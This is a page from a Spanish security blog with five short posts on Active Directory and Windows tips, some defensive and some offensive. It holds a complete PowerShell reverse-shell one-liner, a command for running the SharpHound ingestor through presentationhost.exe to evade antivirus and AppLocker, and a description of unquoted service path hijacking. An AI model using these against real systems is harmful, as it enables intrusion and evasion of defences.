jueves, 26 de marzo de 2020

Usar BloodHound Ingestor en entornos hard: Presentationhost.exe

Estimados amigos de Inseguros !!!

Seguro que conoces la herramienta BloodHound para enumeración de dominios. Llevamos años disfrutando de esta pedazo de herramienta que te muestra gráficamente "los pasos" a seguir para liquidarte un Active Directory... bueno entre comillas...

Como sabes, la herramienta se basa en una parte servidora y un cliente o "ingestor" que recopila los gráficos contra Active Directory para su posterior visionado. Bien...

La teoría siempre es buena, pero la práctica a veces se complica, por ejemplo, con un antivirus de nueva generación que me detecta el uso del "ingestor" tanto por exe, como por Powershell.

Gracias al proyecto del señor https://twitter.com/jpg1nc y su proyecto, nos pone en nuestras manos la solución. Usar Presentationhost.exe un lolbins del sistema que no "pasa" por el radar de applocker, antivirus y demás.

Presentationhost.exe es un binario del sistema que ejecuta aplicaciones XAML en el contexto del navegador pero bajo el proceso presentationhost, como decíamos, "inmume" a la detección a fecha de hoy...

El autor nos indica cómo podemos "llamar" a un binario compilado en C# que es el ingestor original, pero en lenguaje .net. De esta manera se pueden evitar restricciones de Powershell.

Entonces, teniendo el método desarrollado, podemos iniciar el proceso en nuestra máquina víctima:
presentationhost.exe path/to/sharphound.xbap


La llamada a la aplicación nos abrirá un internet explorer con la llamada al ingestor.





Imagina la cantidad de llamadas que podemos hacer usando este método. Mil gracias al desarrollador !!!

Aunque me gustaría, la idea no es mía y el artículo original pertenece a este tipo. Mi intención es solo divulgativa y a efectos personales de chuleta.

miércoles, 25 de marzo de 2020

Gratis.Segundo Factor en el móvil con Google Auth. para SonicWall VPN

Estimados amigos de Inseguros !!!

En esta pequeña entrada os voy a comentar una pequeña ayuda que lo mismo te resulta interesante.

Si tienes un sistema Sonicwall con una Vpn, podar usar el Google Authenticator.

¿Pero qué es esto? Lo primero es repasar que es un segundo factor de autenticación. Es un algo que nos permite identificarnos de una manera distinta al usuario y contraseña.



¿Si te digo que son las claves del banco de toda la vida, o el SMS para operar en internet te suena más?

Lo más básico de un segundo factor es que el origen del mismo debe ser distinto del primer factor. Los factores suelen ser: algo que sabes, algo que tienes, algo que eres.

Algo que sabes, una contraseña estática... si pones dos contraseñas que sabes, no está aplicando un 2FA correctamente porque igual que puedo averiguar la primera clave, puedo averiguar la segunda.

Algo que tienes, un tarjeta de coordenadas... un sms, un OTP ( One Time Password) generado por un cacharro RSA...



Algo que eres, una huella... un lectura de iris, de voz, etc.

El asunto mucha veces es más sencillo de lo que parece. En este caso 5 minutos de Google y 10 de pruebas. Muchas veces no avanzamos con las soluciones en las organizaciones porque nosotros mismos nos ponemos barreras, nos creemos que será muy caro, muy complejo.

Es sorprendente la cantidad de cosas que podemos mejorar en nuestro dia a dia sin necesidad de grandes inversiones... Y releyendo esta frase, lo amplio a otros campos de la vida más allá de la seguridad xDDD

Entonces, el proceso es muy sencillo. Imagino que es igual en otros fabricantes, aunque en Sonic Wall es muy sencillo.

En el usuario del firewall, da igual LDAP o local, activar el check OTP. YA ESTA !!!

Con esto el servicio de VPN ya sabe que hay que obtener un OTP del cliente.

Ahora está en la parte del cliente, en tu móvil. Debes bajar la aplicación para Ios o Android.

El proceso es sencillo. La primera vez que lo vas a usar, entras en el portal VPN, como siempre, introduces usuario y contraseña y auto-mágicamente te saldrá un QR para que vincules tu móvil con tu cuenta, es decir, que tu Sonicwall sepa a donde tiene que enviar la solicitud de OTP y quien eres.

Una vez lo vinculas, ya puedes usarlo con el cliente Windows, Mac o lo que sea. No hay que estar constantemente registrando el código QR, esto se hace sólo para "parearlo".

Cada vez que introduzcas usuario y password para conectarte, te pedirá un OTP el móvil como este:


Con este sencillo proceso, podemos ofrecer a nuestros usuarios remotos una manera segura de conectarse a la VPN, incluso en aquellos casos en los que usamos integración con Active Directory y las contraseñas puede que no sean todo lo fuertes que creemos, ya sabes: miempresa.123$ o similares...

Una vez más agradeceros vuestro tiempo para la lectura.




lunes, 24 de febrero de 2020

Tips & Tricks: levantar una consola powershell remota desde cmd

Estimados amigos de inseguros !!!

Si en algún momento de tu vida, por ejemplo, si consigues una webshell, o una shell con sqlmap y necesitas levantar una shell inversa powershell, este es tu código xD. Solo tienes que lanzarlo y poner un netcat en el equipo destino a la escucha...

Espero que te sirva !!!  gracias por leerme.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ip',puerto);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

miércoles, 19 de febrero de 2020

Tips & tricks: No permitir a usuarios no admin meter equipos al dominio

Estimados amigos de Inseguros !!!

Un tip defensivo muy rápido y algo viejuno, pero que no se suele usar.

Imagina un entorno Active Directory en que los equipos pertenecen a UO para controlar cierto comportamiento, como el firewall local o una política de comunicaciones IPSEC.

Qué pasa si doy de alta un equipo, siendo un usuario plano, y no meto ese equipo en la UO que recibe la GPO? Recuerda que un usuario por defecto, sin ser admin, puede meter 10 equipos al dominio...

Pues con este sencillo click, puedes configurar este comportamiento para evitarlo:
https://support.microsoft.com/en-us/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain

Espero que lo uses !!!

Gracias por leerme !!!


jueves, 16 de enero de 2020

T1034. Enumera y soluciona el problema de las comillas en servicios de Windows !!!

Estimados amigos de Inseguros !!!

En el episodio de hoy vamos a comentar una pequeña herramienta o truco para ayudarnos a fortificar y/o atacar nuestros sistemas Windows, como siempre, depende del rol que te toque.

Siguiendo el Framework MITRE, vamos a hablar de la técnica T1034, en concreto Path Interception. Empleada como mecanismo de persistencia, aprovecha una vulnerabilidad de concepto en los servicios Windows para ejecutar de manera controlada binarios.

El concepto es sencillo. En los sistemas Windows arrancamos servicios, y si en los nombres del ejecutable del servicio hay espacio y no se ha empleado las comillas, por ejemplo "c:\mi compañia\mi programa\programa.exe" el comportamiento es que el sistema intentará buscar programa.exe de la siguiente manera:


C:\archivos de programa*\empresa*\nombredeprograma*\programa.exe*
C:\programa.exe
C:\archivos de programa\programa.exe
C:\archivos de programa\empresa\programa.exe
C:\archivos de programa\empresa\nombredeprograma\programa.exe


Buscará primero el binario en cada uno de los sitios que he puesto asterisco.

Si conocemos esto, y podemos escribir en cualquier de esas ubicaciones, podemos colocar nuestra pieza de software, nuestro malware/stager/etc... y que se ejecute cada vez que se inicie el servicio (por ejemplo, cada vez que se inicie el sistema).

El concepto de Services Hijacking es muy viejo, pero el comentarlo es porque aún veo muchos entornos en los que esto no se cuida.

Lo interesante de esto es que podemos usar alguna de las herramientas que hay para enumerar, pero en este que os traigo, tenemos la posibilidad de no solo listar los servicios del Windows que tienen un ejecutable con espacios en los nombres y no tiene comillas !!!! y si queremos, nos modifica el servicio para incluir las comillas, es decir, para solucionarlo.



Como ves en las imágenes de la propia herramienta, el concepto es muy sencillo.

Espero que te sirva de ayuda tanto si vas a atacar, como si vas a proteger.

También, podríamos usar este dato en el SIEM, si trazamos la actividad con SYSMON, preguntando algo así como: si el papa es service.exe y el proceso no es: '\''.*' y algunas cosita más, podrás descubrirlos "in the wild" sin tener que ir al equipo a pasarle la tool...

Bueno, como siempre, dale el uso que quieras, gracias por leerme !!!



Related Posts Plugin for WordPress, Blogger...